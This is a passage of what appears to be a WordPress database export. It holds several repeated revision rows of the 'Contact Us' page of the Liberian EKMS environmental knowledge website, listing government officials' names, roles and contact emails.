src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:38:40','2021-01-18 14:38:40','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3375,42,'2021-01-18 14:48:07','2021-01-18 14:48:07','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"mr wesseh\" alt=\"mr wesseh\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:48:07','2021-01-18 14:48:07','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3376,42,'2021-01-18 14:48:07','2021-01-18 14:48:07','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"mr wesseh\" alt=\"mr wesseh\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:48:07','2021-01-18 14:48:07','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3377,42,'2021-01-18 14:48:07','2021-01-18 14:48:07','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer 